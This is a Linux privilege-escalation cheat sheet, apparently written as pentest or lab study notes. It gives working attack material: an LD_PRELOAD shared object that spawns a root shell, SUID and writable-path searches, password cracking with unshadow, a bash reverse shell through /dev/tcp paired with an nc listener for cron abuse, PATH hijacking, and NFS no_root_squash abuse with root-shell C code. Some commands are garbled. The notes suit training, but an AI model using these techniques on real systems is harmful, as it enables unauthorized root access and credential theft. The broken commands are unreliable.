🐧Linux Privilege Escalation
Enumeration
# Print hostname
hostname
# Kernel information
uname -a
# Processes
/proc/version
# Systems
/etc/issues
# Processes
ps
# Env variables
env
# List sudo commands
sudo -l
# Connections
netstatKernel Exploits
The Kernel exploit methodology is simple:
Identify the kernel version
Search and find an exploit code for the kernel version of the target system
Run the exploit
You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.
# python 2
python -m SimpleHTTPServer 8000
# python 3
python -m http.server 8000Sudo
The steps of this privilege escalation vector can be summarized as follows:
Run
sudo -lCheck for LD_PRELOAD (with the
env_keepoption)Write a simple C code compiled as a share object (.so extension) file
Run the program with
sudorights and the LD_PRELOAD option pointing to our .so file
# This C code spawns a root shell
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main (void) {
setuid(0);
setgid(0);
system("/bin/bash -p");
return 0;
}# Compile the code
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run the program
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find SUID
# List files that have SUID or SGID bits set
find / -type f -04000 -ls 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
# Use unshadow to create a file crackable by John The Ripper
unshadow passwd.txt shadow.txt > passwords.txtCapabilities
# Get capabilities and redirect errors
getcap -r / 2>/dev/nullCron Jobs
Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:
System administrators need to run a script at regular intervals.
They create a cron job to do this
After a while, the script becomes useless, and they delete it
They do not clean the relevant cron job
Two points to note:
The command syntax will vary depending on the available tools. (e.g.
ncwill probably not support the-eoption you may have seen used in other cases)We should always prefer to start reverse shells, as we not want to compromise the system integrity during a real penetration testing engagement.
# Show cron jobs
cat /etc/crontab
# spawn a shell
bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1
# run listener on attacking machine
nc -nlvp xxxx Path
Depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying this.
What folders are located under $PATH
Does your current user have write privileges for any of these folders?
Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?
# This code tries to launch a system binary called "thm"
# include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("thm");
}# search for writable folders
find / - writable 2>/dev/null
# search alternative
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
#compare the previous results with PATH
echo $PATH
# Add /tmp to PATH
export PATH=/tmp:$PATH
# Make sure script is executable, 777 permissions and SUID set
chmod 777 script.c
chmod +x script.c
chmod +s script.cNFS
The critical element for this privilege escalation vector is the
no_root_squashoption. By default, NFS will change the root user tonfsnobodyand strip any file from operating with root privileges. If theno_root_squashoption is present on a writable share, we can create an executable with SUID bit set and run it on the target system.
# Print NFS configuration
cat /etc/exports
# Enumerate mountable shares in attacking machine
showmount -e x.x.x.x
# mount the share
mkdir /tmp/target_shares
mount -o rw x.x.x.x:/share_name /tmp/target_shares
# Compile the nfs script
gcc nfs.c -o nfs -w
# Set SUID
chmod +s nfs
# Set permissions
chmod 777 nfs
# Execute script on the target machine (should get a root shell)
./nfs # Scripts runs bash on the target machine
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}Last updated